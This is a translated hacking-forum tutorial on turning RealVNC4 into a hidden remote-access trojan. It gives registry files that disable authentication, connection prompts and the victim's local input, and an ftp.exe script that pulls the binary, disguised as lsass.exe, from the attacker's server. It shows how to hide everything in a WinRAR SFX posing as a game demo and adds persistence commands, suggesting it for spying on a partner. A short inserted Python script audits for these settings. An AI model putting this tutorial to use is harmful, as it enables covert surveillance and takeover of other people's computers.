Materials:
FTP Server (any)
winvnc4
ResHacker
Trojanizing RealVNC4. Here we will learn to use RealVNC4 in different ways, but first we hide the boring black-and-white icon that appears next to the clock and betrays us whenever RealVNC is active... What do we do? With ResHacker we delete from the resources the icons and images, everything that could give it away:
If you don't want to complicate your life you can download it from http://512.iespana.es/vnc already compiled with everything, and finally rename it to "lsass.exe", taking advantage of a "vulnerability" in Task Manager: it says lsass.exe cannot be ended XD.
Now, assuming we are in a shell... we will upload the files via FTP.
Open our FTP server and configure the user name and password:
It should look like this:
Now let's configure our Trojan in two ways... one to only view the victim's desktop without taking control, and another to take total control without the victim being able to do anything, hehe :p. For this we need to create a registry entry as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\winvnc4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"=dword:00000000
"AcceptKeyEvents"=dword:00000000
"AcceptPointerEvents"=dword:00000000
"AcceptCutText"=dword:00000000
"SendCutText"=dword:00000000
"DisableLocalInputs"=dword:00000000
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000000
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000
Copy this, paste it into Notepad and save it as "vm.tmp", which means "View Mode"... If instead you want to manage the victim's desktop, paste this text:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\winvnc4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"="0"
"AcceptKeyEvents"=dword:00000001
"AcceptPointerEvents"=dword:00000001
"AcceptCutText"=dword:00000001
"SendCutText"=dword:00000001
"DisableLocalInputs"=dword:00000001
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000001
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000
"PortNumber"=dword:0000170c
"IdleTimeout"=dword:00000e10
"HTTPPortNumber"=dword:000016a8
"RemovePattern"=dword:00000000
and save it as "ct.tmp", which means "Total Control". Now we upload the configurations and VNC from our shell using the ftp.exe command as follows:
The idea is to use the echo command to write a text file that ftp.exe will then execute as commands, like this:
echo open>> ftp.txt
echo 192.168.1.69>> ftp.txt          (here 192.168.1.69 is the IP of our FTP server)
echo user>> ftp.txt                  (this is the FTP user)
echo pass>> ftp.txt                  (this is the FTP password)
echo get lsass.exe>> ftp.txt         (this is our VNC4)
echo get wm_hooks.dll>> ftp.txt
echo get logmessages.dll>> ftp.txt
echo get vm.tmp>> ftp.txt            (use "vm" if we only want to watch, "ct" if we want control)
echo quit>> ftp.txt
Now run the command that downloads everything for us: ftp -s:ftp.txt. Once we have it all, we import the configuration into the registry: reg import vm.tmp or reg import ct.tmp, depending on whether you only want to watch or to take control.
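As an added defensive check (not part of the original post), the following Python parses a .reg export in the format shown above and flags the winvnc4 settings that make a VNC server silent and unauthenticated; the sample .reg text is constructed, and the function names are my own.

```python
import re

# Constructed sample: a .reg export shaped like the "ct.tmp" file above
# (hypothetical values, not captured from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\winvnc4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"Hosts"="0"
"AcceptKeyEvents"=dword:00000001
"PortNumber"=dword:0000170c
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^"([^"]+)"=(?:"(.*)"|dword:([0-9a-fA-F]{8}))$')


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}.

    String values stay strings; dword values become ints.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            name, string_val, dword_val = m.groups()
            current[name] = string_val if dword_val is None else int(dword_val, 16)
    return keys


def audit_winvnc(keys):
    """Return a list of findings for winvnc4 keys configured the way this post describes."""
    findings = []
    for key_path, vals in keys.items():
        if not key_path.lower().endswith(r'\realvnc\winvnc4'):
            continue
        if str(vals.get('SecurityTypes', '')).lower() == 'none':
            findings.append('SecurityTypes=None: no password is required to connect')
        if vals.get('QueryConnect') == 0:
            findings.append('QueryConnect=0: the logged-on user is never prompted about connections')
        if vals.get('AcceptKeyEvents') == 1:
            findings.append('AcceptKeyEvents=1: remote keyboard input is accepted')
    return findings
```

Run it against the output of `reg export HKLM\SOFTWARE\RealVNC\winvnc4 out.reg` (decoded from UTF-16) on a host you administer; an empty list means none of the post's weak settings are present.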
Now that our Trojan is ready and configured, we run it as follows:
lsass.exe -register
lsass.exe -start
Now that our Trojan is running as a service, we are ready to connect with our client:
Where it says 127.0.0.1, put the IP of the victim that has the Trojan.
If you look... there is no icon that would betray its existence, and even if you click the primary or secondary mouse button (right click and left click) nothing appears:
Now we'll do it another way... you'll like this one: baiting without being in a shell, using WinRAR.
Materials: WinRAR
RealVNC4
Now select the following files and compress them:
and proceed to build our Trojan:
1: We will create an "SFX" file...
2: Go to the Advanced tab and click on "SFX Options".
3: As the extraction folder put "%HOMEDRIVE%%HOMEPATH%\update" and under "Run after extraction" put "setup" (I will explain why later).
4: In the "Modes" tab select "Hide all" and "Skip existing files" to avoid future mistakes and so that nothing is shown, because we want to be as quiet as possible, right?
5: In "Text and icon", where it says "Load SFX icon from file", choose an icon of your liking... in my case I used one from a game called "Max Card", and press OK once.
6: In the comment text that appears on one side, it says: Setup=setup. Replace it with the following:
Setup="%windir%\system32\cmd.exe" /c reg import "%HOMEDRIVE%%HOMEPATH%\update\vm.tmp"
Setup=lsass.exe -noconsole -register
Setup=lsass.exe -noconsole -start
Make sure each Setup is on its own line. Now, what does this do? Let me explain:
Setup="%windir%\system32\cmd.exe" /c reg import "%HOMEDRIVE%%HOMEPATH%\update\vm.tmp"   // import our Trojan's configuration
Setup=lsass.exe -noconsole -register   // register the Trojan to run as a service in SYSTEM mode
Setup=lsass.exe -noconsole -start   // start the Trojan
Now we accept everything and something like this should appear:
In my case I used the Max Card icon to tell my dear good friend called "Victim" that it is the demo of MAX COMB III (obviously it isn't), and when he opens it the same thing happens as in the first example:
Without any icon, and we connect with our client:
Obviously 127.0.0.1 should be the IP of the victim.
Now you can find out whether your girlfriend is cheating on you, or give someone the fright of their life by showing that you have always had control of their PC XD.
Note: You can add extra registry entries to run it every time the PC starts, or whatever you want.
The applications and the video are at
http://512.iespana.es/vnc. Att. Yan
Unilola Software.
- 1) You can create a .bat with the following characteristics:
1 - the first removes the happy little icon.
2 - the second disables authentication.
3 - the third starts it with the system.
reg add hklm\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1 /f
reg add hklm\SOFTWARE\ORL\WinVNC3 /v authrequired /t REG_DWORD /d 0 /f
reg add hklm\software\microsoft\windows\currentversion\run /v dllhost.exe /t REG_SZ /d winvnc.exe /f